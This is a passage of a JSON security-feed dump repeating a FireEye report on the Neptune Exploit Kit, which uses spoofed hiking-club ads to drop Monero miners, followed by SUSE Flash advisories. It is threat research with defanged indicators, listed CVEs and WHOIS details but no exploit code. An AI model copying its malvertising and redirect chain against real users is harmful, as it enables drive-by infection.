"CVE-2014-6332", "CVE-2016-0189", "CVE-2016-4117", "CVE-2015-8651"], "modified": "2016-07-14T16:37:00", "id": "FIREEYE:0A49354849202DA95FE69EEC5811E6DD", "href": "https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:25:01", "description": "Exploit kit (EK) activity has been on the decline ever since [Angler Exploit Kit was shut down](<https://securityintelligence.com/news/say-goodbye-to-the-angler-exploit-kit/>) in 2016. [Fewer people using Internet Explorer](<https://threatpost.com/exploit-kit-activity-quiets-but-is-far-from-silent/124461/>) and a [drop in browser support for Adobe Flash](<https://blog.mozilla.org/futurereleases/2016/07/20/reducing-adobe-flash-usage-in-firefox/>) \u2013 two primary targets of many exploit kits \u2013 have also contributed to this decline. Additionally, some popular redirect campaigns using [PseudoDarkleech and EITest Gate to Rig Exploit Kit](<http://www.darkreading.com/attacks-breaches/rig-exploit-kit-takedown-sheds-light-on-domain-shadowing/d/d-id/1329085>) were shut down in the first half of this year.\n\nDespite all this, [malvertising campaigns involving exploit kits](<https://www.fireeye.com/blog/threat-research/2017/03/still_getting_served.html>) remain active. The Neptune Exploit Kit (or Terror EK), which initially started as a Sundown EK copycat operation, has relied heavily on malvertisements. Early use of this exploit kit saw domains with very similar patterns dropping cryptocurrency miners through malvertisements:\n\n * networkmarketingpro3[.]us\n * networkmarketingpro2[.]us\n * onlinesalesproaffiliate1[.]us\n * onlinesalesproaffiliate2[.]us\n * onlinesalesproaffiliate3[.]us\n * onlinesalesproaffiliate4[.]us\n * onlinesalesproaffiliate5[.]us\n * onlinesalesproaffiliate6[.]us\n\nPayloads spread by Neptune Exploit Kit have since diversified. 
Recently, we have seen changes in Neptune EK\u2019s URI patterns, landing pages, malvertisement campaigns and login account details associated with the cryptocurrency mining payloads. \n\n#### Propagation\n\nSince July 16, our Dynamic Threat Intelligence (DTI) has observed changes in URI patterns for Neptune Exploit Kit. At the time of writing, the new campaign abuses a legitimate popup ad service (within Alexa\u2019s top 100) with redirects to ads about hiking clubs, as shown in Figure 1.\n\n \nFigure 1: Fake ad for a hiking club leading to Neptune EK\n\nRedirects from domains associated with these ads eventually use 302 redirects to move victims to exploit kit landing pages. Fake domains involved in these redirects imitate real domains. For example, highspirittreks[.]club shown in Figure 1 spoofs highspirittreks[.]com. Other hiking fake ads use similarly spoofed legitimate site names with .club domains. Figure 2 shows a redirect from a fake site\u2019s pop-up.\n\n \nFigure 2: Silent redirect to EK landing page\n\nFireEye Dynamic Threat Intelligence (DTI) stats show the regions being affected by this campaign (Figure 3). \n\n \nFigure 3: Regions affected by the malvertisement campaign, as observed from customer data\n\nA few instances of the redirect involve flvto[.]download (mimicking the legitimate www.flvto[.]biz) instead of hiking club fake ads. Figure 4 and Figure 5 show the legitimate domain and fake domain, respectively, for comparison\u2019s sake.\n\n \nFigure 4: Real page, flvto[.]biz (Alexa rank 2,674)\n\n \nFigure 5: Fake page, flvto[.]download\n\nMost of the ads linked to this campaign have been observed on high-traffic torrent and multimedia hosting sites.\n\nSites are hosted on IP **95.85.62.226**. Reverse lookup for this IP shows:\n\n * 2watchmygf[.]stream\n * flvto[.]download\n * highspirittreks[.]club\n * treknepal[.]club\n\nOther hosted IPs and domains of the same campaign are in the Indicators of Compromise section at the end of the post. 
All IPs point to locations in Amsterdam.\n\nSince July 16, related EK infrastructure has been hosted on domains protected by Whois Guard. However, in recent activity, domains are linked to the Registrant email: \u2018gabendollar399@gmx[.]com\u2019. \n\nThe following domains are currently associated with this email:\n\n**Domain Name** | **Create Date** | **Registrar**\n---|---|---\n[itsmebecauseyoua[.]pw](<https://whois.domaintools.com/itsmebecauseyoua.pw>) | 2017-03-05 | \\--\n[loansforevery[.]us](<https://whois.domaintools.com/loansforevery.us>) | 2017-04-14 | 1 HOST RUSSIA, INC\n[managetheworld[.]us](<https://whois.domaintools.com/managetheworld.us>) | 2017-04-14 | 1 HOST RUSSIA, INC\n[nudecams[.]us](<https://whois.domaintools.com/nudecams.us>) | 2017-04-14 | 1 HOST RUSSIA, INC\n\n#### Exploits/Landing Page\n\nThe landing page for the Neptune Exploit Kit redirects to further HTML and Adobe Flash exploit links after it checks the Flash versions installed on the victim\u2019s machine (see Figure 6).\n\n \nFigure 6: Landing page of Neptune EK\n\nThis EK exploits multiple vulnerabilities in one run. 
Most of these exploits are well-known and commonly seen in other exploit kits.\n\nCurrently, Neptune EK uses three Internet Explorer exploits and two Flash exploits:\n\n * [CVE-2016-0189](<https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html>) \u2013 Internet Explorer\n * [CVE-2015-2419](<https://www.fireeye.com/blog/threat-research/2015/08/cve-2015-2419_inte.html>) \u2013 Internet Explorer\n * [CVE-2014-6332](<https://technet.microsoft.com/en-us/library/security/ms14-064.aspx>) \u2013 Internet Explorer\n * [CVE-2015-8651](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8651>) \u2013 Adobe Flash Player\n * [CVE-2015-7645](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7645>) \u2013 Adobe Flash Player\n\n#### Payload (Monero miner)\n\nThe payload is dropped as a plain executable from one of the URIs belonging to the EK domain (the same domain as the landing page). Figure 7 shows a typical response header for these cases.\n\n \nFigure 7: Response header for Monero miner payload\n\nPost-infection traffic shows an attempt to connect to minergate[.]com (Figure 8) and a login attempt using the cpu-miner service via the login email monsterkill20@mail[.]com (Figure 9). Login attempts are invoked via the command line:\n\n\n\n \nFigure 8: DNS query to minergate[.]com\n\n \nFigure 9: Login attempt\n\n#### Conclusion\n\nDespite an observable decline in exploit kit activity, users are still at risk, especially if they have outdated or unpatched software. This threat is especially dangerous considering drive-by exploit kits (such as Neptune EK) can use malvertisements to seamlessly download payloads without ever alerting the user.\n\nFireEye NX [detects exploit kit infection attempts](<https://www.fireeye.com/products/nx-network-security-products.html>) before the malware payload is downloaded to the user\u2019s machine. 
Additionally, malware payloads dropped by exploit kits are detected in all other FireEye products.\n\n#### Indicators of Compromise\n\n##### Malvertisement domains:\n\n * hxxp://treknepal[.]club/\n * hxxp://highspirittrecks[.]club\n * hxxp://advnepaltrekking[.]club\n * hxxp://nepalyogatrek[.]club\n * hxxp://flvto[.]download\n\n##### Malvertisement IPs:\n\n * 95.85.62.226\n * 185.82.202.36\n\n##### EK domains (current active) registrant:\n\nDomain Name: MANAGETHEWORLD.US \nDomain ID: D59392852-US \nSponsoring Registrar: NAMECHEAP, INC. \nSponsoring Registrar IANA ID: 1068 \nRegistrar URL (registration services): http://www.namecheap[.]com \nDomain Status: clientTransferProhibited \nRegistrant ID: NLGUS4BVD3M2DN2Y \nRegistrant Name: kreb son \nRegistrant Address1: Maker 541 \nRegistrant City: Navada \nRegistrant State/Province: SA \nRegistrant Postal Code: 546451 \nRegistrant Country: Bulgaria \nRegistrant Country Code: BG \nRegistrant Phone Number: +44.45623417852 \nRegistrant Email: gabendollar399@gmx[.]com \nRegistrant Application Purpose: P1 \nRegistrant Nexus Category: C11 \nAdministrative Contact ID: VNM50NNJ5Y0VNLDY \nAdministrative Contact Name: kreb son \nAdministrative Contact Address1: Maker 541 \nAdministrative Contact City: Navada \nAdministrative Contact State/Province: SA \nAdministrative Contact Postal Code: 546451 \nAdministrative Contact Country: Bulgaria \nAdministrative Contact Country Code: BG \nAdministrative Contact Phone Number: +44.45623417852 \nAdministrative Contact Email: gabendollar399@gmx[.]com\n\n##### Sample EK URI Pattern:\n\nforum_jVpbUAr/showthread.php?id=xxxxxxx\n\n##### Sample MD5s:\n\nb678ac0b870b78060a2a9f599000302d \n5a18c92e148bbd7f10077f8e7431326e\n\n#### Acknowledgement\n\nWe would like to thank Hassan Faizan for his contributions to this discovery.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
"NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-22T14:00:00", "type": "fireeye", "title": "Hiking Club Malvertisements Drop Monero Miners Via Neptune Exploit Kit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332", "CVE-2015-2419", "CVE-2015-7645", "CVE-2015-8651", "CVE-2016-0189"], "modified": "2017-08-22T14:00:00", "id": "FIREEYE:2B54485AD5D7B8DCC55F5A6BE1F3DBD6", "href": "https://www.fireeye.com/blog/threat-research/2017/08/neptune-exploit-kit-malvertising.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-09-12T20:44:52", "description": "Exploit kit (EK) activity has been on the decline ever since [Angler Exploit Kit was shut down](<https://securityintelligence.com/news/say-goodbye-to-the-angler-exploit-kit/>) in 2016. [Fewer people using Internet Explorer](<https://threatpost.com/exploit-kit-activity-quiets-but-is-far-from-silent/124461/>) and a [drop in browser support for Adobe Flash](<https://blog.mozilla.org/futurereleases/2016/07/20/reducing-adobe-flash-usage-in-firefox/>) \u2013 two primary targets of many exploit kits \u2013 have also contributed to this decline. 
Additionally, some popular redirect campaigns using [PseudoDarkleech and EITest Gate to Rig Exploit Kit](<http://www.darkreading.com/attacks-breaches/rig-exploit-kit-takedown-sheds-light-on-domain-shadowing/d/d-id/1329085>) were shut down in the first half of this year.\n\nDespite all this, [malvertising campaigns involving exploit kits](<https://www.fireeye.com/blog/threat-research/2017/03/still_getting_served.html>) remain active. The Neptune Exploit Kit (or Terror EK), which started as a Sundown EK copycat operation, has relied heavily on malvertisements. Early use of this exploit kit saw domains with very similar patterns dropping cryptocurrency miners through malvertisements:\n\n * networkmarketingpro3[.]us\n * networkmarketingpro2[.]us\n * onlinesalesproaffiliate1[.]us\n * onlinesalesproaffiliate2[.]us\n * onlinesalesproaffiliate3[.]us\n * onlinesalesproaffiliate4[.]us\n * onlinesalesproaffiliate5[.]us\n * onlinesalesproaffiliate6[.]us\n\nPayloads spread by Neptune Exploit Kit have since diversified. Recently, we have seen changes in Neptune EK\u2019s URI patterns, landing pages, malvertisement campaigns and login account details associated with the cryptocurrency mining payloads. \n\n#### Propagation\n\nSince July 16, our Dynamic Threat Intelligence (DTI) has observed changes in URI patterns for Neptune Exploit Kit. At the time of writing, the new campaign abuses a legitimate popup ad service (within Alexa\u2019s top 100) with redirects to ads about hiking clubs, as shown in Figure 1.\n\n \nFigure 1: Fake ad for a hiking club leading to Neptune EK\n\nRedirects from domains associated with these ads eventually use 302 redirects to move victims to exploit kit landing pages. Fake domains involved in these redirects imitate real domains. For example, highspirittreks[.]club shown in Figure 1 spoofs highspirittreks[.]com. Other fake hiking ads use similarly spoofed legitimate site names under .club domains. 
Figure 2 shows a redirect from a fake site\u2019s pop-up.\n\n \nFigure 2: Silent redirect to EK landing page\n\nFireEye Dynamic Threat Intelligence (DTI) stats show the regions being affected by this campaign (Figure 3). \n\n \nFigure 3: Regions affected by the malvertisement campaign, as observed from customer data\n\nA few instances of the redirect involve flvto[.]download (mimicking the legitimate www.flvto[.]biz) instead of hiking club fake ads. Figure 4 and Figure 5 show the legitimate domain and fake domain, respectively, for comparison\u2019s sake.\n\n \nFigure 4: Real page, flvto[.]biz (Alexa rank 2,674)\n\n \nFigure 5: Fake page, flvto[.]download\n\nMost of the ads linked to this campaign have been observed on high-traffic torrent and multimedia hosting sites.\n\nSites are hosted on IP **95.85.62.226**. Reverse lookup for this IP shows:\n\n * 2watchmygf[.]stream\n * flvto[.]download\n * highspirittreks[.]club\n * treknepal[.]club\n\nOther hosted IPs and domains of the same campaign are in the Indicators of Compromise section at the end of the post. All IPs point to locations in Amsterdam.\n\nSince July 16, related EK infrastructure has been hosted on domains protected by Whois Guard. However, in recent activity, domains are linked to the Registrant email: \u2018gabendollar399@gmx[.]com\u2019. 
\n\nThe following domains are currently associated with this email:\n\n| Domain Name | Create Date | Registrar |\n|---|---|---|\n| [itsmebecauseyoua[.]pw](<https://whois.domaintools.com/itsmebecauseyoua.pw>) | 2017-03-05 | -- |\n| [loansforevery[.]us](<https://whois.domaintools.com/loansforevery.us>) | 2017-04-14 | 1 HOST RUSSIA, INC |\n| [managetheworld[.]us](<https://whois.domaintools.com/managetheworld.us>) | 2017-04-14 | 1 HOST RUSSIA, INC |\n| [nudecams[.]us](<https://whois.domaintools.com/nudecams.us>) | 2017-04-14 | 1 HOST RUSSIA, INC |\n\n#### Exploits/Landing Page\n\nThe landing page for the Neptune Exploit Kit redirects to further HTML and Adobe Flash exploit links after it checks the Flash versions installed on the victim\u2019s machine (see Figure 6).\n\n \nFigure 6: Landing page of Neptune EK\n\nThis EK exploits multiple vulnerabilities in one run. Most of these exploits are well-known and commonly seen in other exploit kits.\n\nCurrently, Neptune EK uses three Internet Explorer exploits and two Flash exploits:\n\n * [CVE-2016-0189](<https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html>) \u2013 Internet Explorer\n * [CVE-2015-2419](<https://www.fireeye.com/blog/threat-research/2015/08/cve-2015-2419_inte.html>) \u2013 Internet Explorer\n * [CVE-2014-6332](<https://technet.microsoft.com/en-us/library/security/ms14-064.aspx>) \u2013 Internet Explorer\n * [CVE-2015-8651](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8651>) \u2013 Adobe Flash Player\n * [CVE-2015-7645](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7645>) \u2013 Adobe Flash Player\n\n#### Payload (Monero miner)\n\nThe payload is dropped as a plain executable from one of the URIs belonging to the EK domain (the same domain as the landing page). 
Figure 7 shows a typical response header for these cases.\n\n \nFigure 7: Response header for Monero miner payload\n\nPost-infection traffic shows an attempt to connect to minergate[.]com (Figure 8) and a login attempt using the cpu-miner service via the login email monsterkill20@mail[.]com (Figure 9). Login attempts are invoked via the command line:\n\n\n\n \nFigure 8: DNS query to minergate[.]com\n\n \nFigure 9: Login attempt\n\n#### Conclusion\n\nDespite an observable decline in exploit kit activity, users are still at risk, especially if they have outdated or unpatched software. This threat is especially dangerous considering drive-by exploit kits (such as Neptune EK) can use malvertisements to seamlessly download payloads without ever alerting the user.\n\nFireEye NX [detects exploit kit infection attempts](<https://www.fireeye.com/products/nx-network-security-products.html>) before the malware payload is downloaded to the user\u2019s machine. Additionally, malware payloads dropped by exploit kits are detected in all other FireEye products.\n\n#### Indicators of Compromise\n\n##### Malvertisement domains:\n\n * hxxp://treknepal[.]club/\n * hxxp://highspirittrecks[.]club\n * hxxp://advnepaltrekking[.]club\n * hxxp://nepalyogatrek[.]club\n * hxxp://flvto[.]download\n\n##### Malvertisement IPs:\n\n * 95.85.62.226\n * 185.82.202.36\n\n##### EK domains (currently active) registrant:\n\nDomain Name: MANAGETHEWORLD.US \nDomain ID: D59392852-US \nSponsoring Registrar: NAMECHEAP, INC. 
\nSponsoring Registrar IANA ID: 1068 \nRegistrar URL (registration services): http://www.namecheap[.]com \nDomain Status: clientTransferProhibited \nRegistrant ID: NLGUS4BVD3M2DN2Y \nRegistrant Name: kreb son \nRegistrant Address1: Maker 541 \nRegistrant City: Navada \nRegistrant State/Province: SA \nRegistrant Postal Code: 546451 \nRegistrant Country: Bulgaria \nRegistrant Country Code: BG \nRegistrant Phone Number: +44.45623417852 \nRegistrant Email: gabendollar399@gmx[.]com \nRegistrant Application Purpose: P1 \nRegistrant Nexus Category: C11 \nAdministrative Contact ID: VNM50NNJ5Y0VNLDY \nAdministrative Contact Name: kreb son \nAdministrative Contact Address1: Maker 541 \nAdministrative Contact City: Navada \nAdministrative Contact State/Province: SA \nAdministrative Contact Postal Code: 546451 \nAdministrative Contact Country: Bulgaria \nAdministrative Contact Country Code: BG \nAdministrative Contact Phone Number: +44.45623417852 \nAdministrative Contact Email: gabendollar399@gmx[.]com\n\n##### Sample EK URI Pattern:\n\nforum_jVpbUAr/showthread.php?id=xxxxxxx\n\n##### Sample MD5s:\n\nb678ac0b870b78060a2a9f599000302d \n5a18c92e148bbd7f10077f8e7431326e\n\n#### Acknowledgement\n\nWe would like to thank Hassan Faizan for his contributions to this discovery.\n", "edition": 2, "cvss3": {}, "published": "2017-08-22T10:00:00", "type": "fireeye", "title": "Hiking Club Malvertisements Drop Monero Miners Via Neptune Exploit Kit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2014-6332", "CVE-2016-0189", "CVE-2015-8651", "CVE-2015-2419", "CVE-2015-7645"], "modified": "2017-08-22T10:00:00", "id": "FIREEYE:0CAA37548C7EBA899FA1174794304489", "href": "https://www.fireeye.com/blog/threat-research/2017/08/neptune-exploit-kit-malvertising.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:18:22", "description": "Exploit kit (EK) activity has been on the decline ever since [Angler Exploit Kit was shut down](<https://securityintelligence.com/news/say-goodbye-to-the-angler-exploit-kit/>) in 2016. [Fewer people using Internet Explorer](<https://threatpost.com/exploit-kit-activity-quiets-but-is-far-from-silent/124461/>) and a [drop in browser support for Adobe Flash](<https://blog.mozilla.org/futurereleases/2016/07/20/reducing-adobe-flash-usage-in-firefox/>) \u2013 two primary targets of many exploit kits \u2013 have also contributed to this decline. Additionally, some popular redirect campaigns using [PseudoDarkleech and EITest Gate to Rig Exploit Kit](<http://www.darkreading.com/attacks-breaches/rig-exploit-kit-takedown-sheds-light-on-domain-shadowing/d/d-id/1329085>) were shut down in the first half of this year.\n\nDespite all this, [malvertising campaigns involving exploit kits](<https://www.fireeye.com/blog/threat-research/2017/03/still_getting_served.html>) remain active. The Neptune Exploit Kit (or Terror EK), which started as a Sundown EK copycat operation, has relied heavily on malvertisements. Early use of this exploit kit saw domains with very similar patterns dropping cryptocurrency miners through malvertisements:\n\n * networkmarketingpro3[.]us\n * networkmarketingpro2[.]us\n * onlinesalesproaffiliate1[.]us\n * onlinesalesproaffiliate2[.]us\n * onlinesalesproaffiliate3[.]us\n * onlinesalesproaffiliate4[.]us\n * onlinesalesproaffiliate5[.]us\n * onlinesalesproaffiliate6[.]us\n\nPayloads spread by Neptune Exploit Kit have since diversified. 
Recently, we have seen changes in Neptune EK\u2019s URI patterns, landing pages, malvertisement campaigns and login account details associated with the cryptocurrency mining payloads. \n\n#### Propagation\n\nSince July 16, our Dynamic Threat Intelligence (DTI) has observed changes in URI patterns for Neptune Exploit Kit. At the time of writing, the new campaign abuses a legitimate popup ad service (within Alexa\u2019s top 100) with redirects to ads about hiking clubs, as shown in Figure 1.\n\n \nFigure 1: Fake ad for a hiking club leading to Neptune EK\n\nRedirects from domains associated with these ads eventually use 302 redirects to move victims to exploit kit landing pages. Fake domains involved in these redirects imitate real domains. For example, highspirittreks[.]club shown in Figure 1 spoofs highspirittreks[.]com. Other fake hiking ads use similarly spoofed legitimate site names under .club domains. Figure 2 shows a redirect from a fake site\u2019s pop-up.\n\n \nFigure 2: Silent redirect to EK landing page\n\nFireEye Dynamic Threat Intelligence (DTI) stats show the regions being affected by this campaign (Figure 3). \n\n \nFigure 3: Regions affected by the malvertisement campaign, as observed from customer data\n\nA few instances of the redirect involve flvto[.]download (mimicking the legitimate www.flvto[.]biz) instead of hiking club fake ads. Figure 4 and Figure 5 show the legitimate domain and fake domain, respectively, for comparison\u2019s sake.\n\n \nFigure 4: Real page, flvto[.]biz (Alexa rank 2,674)\n\n \nFigure 5: Fake page, flvto[.]download\n\nMost of the ads linked to this campaign have been observed on high-traffic torrent and multimedia hosting sites.\n\nSites are hosted on IP **95.85.62.226**. Reverse lookup for this IP shows:\n\n * 2watchmygf[.]stream\n * flvto[.]download\n * highspirittreks[.]club\n * treknepal[.]club\n\nOther hosted IPs and domains of the same campaign are in the Indicators of Compromise section at the end of the post. 
All IPs point to locations in Amsterdam.\n\nSince July 16, related EK infrastructure has been hosted on domains protected by Whois Guard. However, in recent activity, domains are linked to the Registrant email: \u2018gabendollar399@gmx[.]com\u2019. \n\nThe following domains are currently associated with this email:\n\n| Domain Name | Create Date | Registrar |\n|---|---|---|\n| [itsmebecauseyoua[.]pw](<https://whois.domaintools.com/itsmebecauseyoua.pw>) | 2017-03-05 | -- |\n| [loansforevery[.]us](<https://whois.domaintools.com/loansforevery.us>) | 2017-04-14 | 1 HOST RUSSIA, INC |\n| [managetheworld[.]us](<https://whois.domaintools.com/managetheworld.us>) | 2017-04-14 | 1 HOST RUSSIA, INC |\n| [nudecams[.]us](<https://whois.domaintools.com/nudecams.us>) | 2017-04-14 | 1 HOST RUSSIA, INC |\n\n#### Exploits/Landing Page\n\nThe landing page for the Neptune Exploit Kit redirects to further HTML and Adobe Flash exploit links after it checks the Flash versions installed on the victim\u2019s machine (see Figure 6).\n\n \nFigure 6: Landing page of Neptune EK\n\nThis EK exploits multiple vulnerabilities in one run. 
Most of these exploits are well-known and commonly seen in other exploit kits.\n\nCurrently, Neptune EK uses three Internet Explorer exploits and two Flash exploits:\n\n * [CVE-2016-0189](<https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html>) \u2013 Internet Explorer\n * [CVE-2015-2419](<https://www.fireeye.com/blog/threat-research/2015/08/cve-2015-2419_inte.html>) \u2013 Internet Explorer\n * [CVE-2014-6332](<https://technet.microsoft.com/en-us/library/security/ms14-064.aspx>) \u2013 Internet Explorer\n * [CVE-2015-8651](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8651>) \u2013 Adobe Flash Player\n * [CVE-2015-7645](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7645>) \u2013 Adobe Flash Player\n\n#### Payload (Monero miner)\n\nThe payload is dropped as a plain executable from one of the URIs belonging to the EK domain (the same domain as the landing page). Figure 7 shows a typical response header for these cases.\n\n \nFigure 7: Response header for Monero miner payload\n\nPost-infection traffic shows an attempt to connect to minergate[.]com (Figure 8) and a login attempt using the cpu-miner service via the login email monsterkill20@mail[.]com (Figure 9). Login attempts are invoked via the command line:\n\n\n\n \nFigure 8: DNS query to minergate[.]com\n\n \nFigure 9: Login attempt\n\n#### Conclusion\n\nDespite an observable decline in exploit kit activity, users are still at risk, especially if they have outdated or unpatched software. This threat is especially dangerous considering drive-by exploit kits (such as Neptune EK) can use malvertisements to seamlessly download payloads without ever alerting the user.\n\nFireEye NX [detects exploit kit infection attempts](<https://www.fireeye.com/products/nx-network-security-products.html>) before the malware payload is downloaded to the user\u2019s machine. 
Additionally, malware payloads dropped by exploit kits are detected in all other FireEye products.\n\n#### Indicators of Compromise\n\n##### Malvertisement domains:\n\n * hxxp://treknepal[.]club/\n * hxxp://highspirittrecks[.]club\n * hxxp://advnepaltrekking[.]club\n * hxxp://nepalyogatrek[.]club\n * hxxp://flvto[.]download\n\n##### Malvertisement IPs:\n\n * 95.85.62.226\n * 185.82.202.36\n\n##### EK domains (currently active) registrant:\n\nDomain Name: MANAGETHEWORLD.US \nDomain ID: D59392852-US \nSponsoring Registrar: NAMECHEAP, INC. \nSponsoring Registrar IANA ID: 1068 \nRegistrar URL (registration services): http://www.namecheap[.]com \nDomain Status: clientTransferProhibited \nRegistrant ID: NLGUS4BVD3M2DN2Y \nRegistrant Name: kreb son \nRegistrant Address1: Maker 541 \nRegistrant City: Navada \nRegistrant State/Province: SA \nRegistrant Postal Code: 546451 \nRegistrant Country: Bulgaria \nRegistrant Country Code: BG \nRegistrant Phone Number: +44.45623417852 \nRegistrant Email: gabendollar399@gmx[.]com \nRegistrant Application Purpose: P1 \nRegistrant Nexus Category: C11 \nAdministrative Contact ID: VNM50NNJ5Y0VNLDY \nAdministrative Contact Name: kreb son \nAdministrative Contact Address1: Maker 541 \nAdministrative Contact City: Navada \nAdministrative Contact State/Province: SA \nAdministrative Contact Postal Code: 546451 \nAdministrative Contact Country: Bulgaria \nAdministrative Contact Country Code: BG \nAdministrative Contact Phone Number: +44.45623417852 \nAdministrative Contact Email: gabendollar399@gmx[.]com\n\n##### Sample EK URI Pattern:\n\nforum_jVpbUAr/showthread.php?id=xxxxxxx\n\n##### Sample MD5s:\n\nb678ac0b870b78060a2a9f599000302d \n5a18c92e148bbd7f10077f8e7431326e\n\n#### Acknowledgement\n\nWe would like to thank Hassan Faizan for his contributions to this discovery.\n", "edition": 2, "cvss3": {}, "published": "2017-08-22T10:00:00", "type": "fireeye", "title": "Hiking Club Malvertisements Drop Monero Miners Via Neptune Exploit Kit", 
"bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332", "CVE-2016-0189", "CVE-2015-8651", "CVE-2015-2419", "CVE-2015-7645"], "modified": "2017-08-22T10:00:00", "id": "FIREEYE:D549372E644DEECBB7AEE8031D35DA4D", "href": "https://www.fireeye.com/blog/threat-research/2017/08/neptune-exploit-kit-malvertising.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:32:45", "description": "flash-player was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2016-1019: Adobe Flash Player earlier allowed remote attackers to\n cause a denial of service (application crash) or possibly execute\n arbitrary code via unspecified vectors, as exploited in the wild in\n April 2016 Aliased: (bsc#974209).\n\n", "cvss3": {}, "published": "2016-04-26T17:08:38", "type": "suse", "title": "Security update for flash-player (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-1019"], "modified": "2016-04-26T17:08:38", "id": "OPENSUSE-SU-2016:1157-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-04/msg00055.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:20:17", "description": "flash-player was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2016-1019: Adobe Flash Player earlier allowed remote attackers to\n cause a denial of 
service (application crash) or possibly execute\n arbitrary code via unspecified vectors, as exploited in the wild in\n April 2016 Aliased: (bsc#974209).\n\n", "cvss3": {}, "published": "2016-04-08T15:08:43", "type": "suse", "title": "Security update for flash-player (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-1019"], "modified": "2016-04-08T15:08:43", "id": "OPENSUSE-SU-2016:0987-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-04/msg00009.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:03:50", "description": "flash-player was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2016-1019: Adobe Flash Player allowed remote attackers to cause a\n denial of service (application crash) or possibly execute arbitrary code\n via unspecified vectors, as exploited in the wild in April 2016\n (bsc#974209).\n\n", "cvss3": {}, "published": "2016-04-08T17:08:00", "type": "suse", "title": "Security update for flash-player (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-1019"], "modified": "2016-04-08T17:08:00", "id": "SUSE-SU-2016:0990-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-04/msg00010.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:50:47", "description": "flash-player was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2016-1019: Adobe Flash Player earlier allowed remote attackers to\n cause a denial of service (application crash) or possibly execute\n arbitrary code via unspecified vectors, as exploited in the wild in\n April 2016 Aliased: (bsc#974209).\n\n", "cvss3": {}, "published": "2016-04-08T22:07:39", "type": "suse", "title": "Security update for flash-player (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": 
